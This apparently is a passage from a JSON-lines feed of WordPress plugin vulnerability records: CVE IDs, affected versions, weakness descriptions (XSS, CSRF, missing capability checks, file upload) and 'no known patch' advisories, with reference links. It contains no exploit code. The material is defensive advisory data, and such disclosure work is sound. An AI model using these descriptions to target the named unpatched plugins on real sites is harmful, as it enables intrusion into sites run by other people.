file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89525af0-105a-4d7d-93d1-af724a837e7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89525af0-105a-4d7d-93d1-af724a837e7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.4.1\\\/lcg_adl_main.php#L236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.4.1\\\/lcg_adl_main.php#L236\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/logo-showcase-ultimate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/logo-showcase-ultimate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141393\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9430","slug":"get-a-quote-for-woocommerce","versionImpact":"1.0.0","description":"The Get Quote For Woocommerce \u2013 Request A Quote For Woocommerce plugin for WordPress is vulnerable to unauthorized access of Quote data due to a missing capability check on the ct_tepfw_wp_loaded function in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to download Quote PDF and CSV documents.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d0a0aa7-7bd9-4883-85b6-b7abf338aa75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d0a0aa7-7bd9-4883-85b6-b7abf338aa75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-ct-rfq-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-ct-rfq-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9111","slug":"product-designer","versionImpact":"1.0.35","description":"The Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-designer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-designer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28126b4f-1cb6-4e91-b1c0-09f407d1dbf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28126b4f-1cb6-4e91-b1c0-09f407d1dbf8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12494","slug":"bmlt-meeting-map","versionImpact":"2.6.1","description":"The BMLT Meeting Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bmlt_meeting_map' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/tags\\\/2.6.0\\\/meeting_map.php#L462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73c01967-262c-48ab-a464-401b1cadd4be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73c01967-262c-48ab-a464-401b1cadd4be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0918","slug":"smtp-sendgrid","versionImpact":"1.3.1","description":"The SMTP for SendGrid \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendgrid\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendgrid\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056461\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056461\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234377\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234377\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendgrid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendgrid\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98f2a85-9535-4bf5-900c-f4f630c7b502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98f2a85-9535-4bf5-900c-f4f630c7b502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13862","slug":"s3bubble-amazon-web-services-oembed-media-streaming-support","versionImpact":"8.0","description":"The S3Bubble Media Streaming (AWS|Elementor|YouTube|Vimeo Functionality) WordPress plugin through 8.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7692b768-a33f-45a2-90f1-1f4258493979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12282","slug":"wp-connect","versionImpact":"2.5.6","description":"The WordPress???? WordPress plugin through 2.5.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d81f038-e2bb-4906-a954-78dc971ed793\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d81f038-e2bb-4906-a954-78dc971ed793\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4666","slug":"zotpress","versionImpact":"7.3.15","description":"The Zotpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018nickname\u2019 parameter in all versions up to, and including, 7.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.accounts.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.accounts.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.functions.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.functions.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.options.form.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1058078b-3afa-4fe7-913a-b6fc32252bf6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1058078b-3afa-4fe7-913a-b6fc32252bf6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7683","slug":"latestcheckins","versionImpact":"1","description":"The LatestCheckins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1. This is due to missing or incorrect nonce validation on the 'LatestCheckins' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latestcheckins\\\/trunk\\\/wzw-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latestcheckins\\\/trunk\\\/wzw-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/latestcheckins\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/latestcheckins\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2b1500-04b6-40fb-8d1f-9c210f95788b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2b1500-04b6-40fb-8d1f-9c210f95788b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4347","slug":" woo-advanced-shipment-tracking","description":"The function update_shipment_status_email_status_fun in the plugin Advanced Shipment Tracking for WooCommerce in versions up to 3.2.6 is vulnerable to authenticated arbitrary options update. The function allows attackers (including those at customer level) to update any WordPress option in the database. Version 3.2.5 was initially released as a fix, but doesn't fully address the issue.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-advanced-shipment-tracking-for-woocommerce-fixed-critical-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-advanced-shipment-tracking-for-woocommerce-fixed-critical-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4174b47a-75d0-4ada-bd4d-efbaf0b1a049?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4174b47a-75d0-4ada-bd4d-efbaf0b1a049?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4390","slug":"contact-form-7-style","versionImpact":"3.2","description":"The Contact Form 7 Style plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2. This is due to missing or incorrect nonce validation on the manage_wp_posts_be_qe_save_post() function. This makes it possible for unauthenticated attackers to quick edit templates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-style\\\/trunk\\\/cf7-style-meta-box.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-style\\\/trunk\\\/cf7-style-meta-box.php#L546\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2972cdaf-2d0a-4b55-b4f5-ccf01ff5352c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2972cdaf-2d0a-4b55-b4f5-ccf01ff5352c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4315","slug":"woo-custom-emails","versionImpact":"2.2","description":"The Woo Custom Emails for WordPress is vulnerable to Reflected Cross-Site Scripting via the wcemails_edit parameter in versions up to, and including, 2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6782d8b3-32f9-42e1-874c-35a1e93ffde0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6782d8b3-32f9-42e1-874c-35a1e93ffde0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-custom-emails\\\/trunk\\\/admin\\\/class-wcemails-admin.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-custom-emails\\\/trunk\\\/admin\\\/class-wcemails-admin.php#L335\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3903","slug":"add-custom-css-and-js","versionImpact":"1.20","description":"The Add Custom CSS and JS WordPress plugin through 1.20 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in as author and above add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0e7bd4-948d-47c9-9219-380bda9f3034\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0e7bd4-948d-47c9-9219-380bda9f3034\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3937","slug":"playlist-for-youtube","versionImpact":"1.32","description":"The Playlist for Youtube WordPress plugin through 1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cd5b288-05b3-48b7-9245-f59ce7377861\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cd5b288-05b3-48b7-9245-f59ce7377861\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6431","slug":"media-net-ads-manager","versionImpact":"2.10.13","description":"The Media.net Ads Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and missing capability check in the 'sendMail' function in all versions up to, and including, 2.10.13. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability is only exploitable if anyone has ever logged in through the API.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54fac673-2d83-4d06-a4c0-8bffc269a90c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54fac673-2d83-4d06-a4c0-8bffc269a90c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-net-ads-manager\\\/tags\\\/2.10.13\\\/app\\\/admin\\\/MnetAdHandleAjaxCalls.php#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-net-ads-manager\\\/tags\\\/2.10.13\\\/app\\\/admin\\\/MnetAdHandleAjaxCalls.php#L206\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7304","slug":"ninja-tables","versionImpact":"5.0.12","description":"The Ninja Tables \u2013 Easiest Data Table Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1eb6896-2de3-4d4d-9b5f-253aaffd193b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1eb6896-2de3-4d4d-9b5f-253aaffd193b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.12\\\/app\\\/Hooks\\\/filters.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.12\\\/app\\\/Hooks\\\/filters.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-tables\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-tables\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/#file408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/#file408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140370\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8437","slug":"wp-easy-gallery","versionImpact":"4.8.5","description":"The WP Easy Gallery \u2013 WordPress Gallery Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions hooked via AJAX like wpeg_settings and wpeg_add_gallery in all versions up to, and including, 4.8.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify galleries.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bd5021-4895-4b0e-b517-186959f76095?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bd5021-4895-4b0e-b517-186959f76095?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L42\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9521","slug":"seo-manager","versionImpact":"1.9","description":"The SEO Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17457ff2-917d-4cc4-8c5e-c80cd320cc90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17457ff2-917d-4cc4-8c5e-c80cd320cc90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-manager\\\/trunk\\\/seo-manager.php?rev=2963205#L458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-manager\\\/trunk\\\/seo-manager.php?rev=2963205#L458\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9165","slug":"gift-voucher","versionImpact":"4.4.4","description":"The Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfbee4c-b720-4d10-bfe0-fe9dc12e6268?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfbee4c-b720-4d10-bfe0-fe9dc12e6268?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-voucher\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-voucher\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/giftcard.php#L515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/giftcard.php#L515\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8157","slug":"alphabetical-list","versionImpact":"1.0.3","description":"The Alphabetical List WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bc18c41-fc4c-48c9-bcec-323c502ae620\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bc18c41-fc4c-48c9-bcec-323c502ae620\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13853","slug":"seo-automatic-seo-tools","versionImpact":"4.0.7","description":"The SEO Tools WordPress plugin through 4.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11843","slug":"project-panorama-lite","versionImpact":"1.5.1","description":"The Panorama  WordPress plugin through 1.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dd41559-d88a-4018-a0f0-c8944b6d6f0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dd41559-d88a-4018-a0f0-c8944b6d6f0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
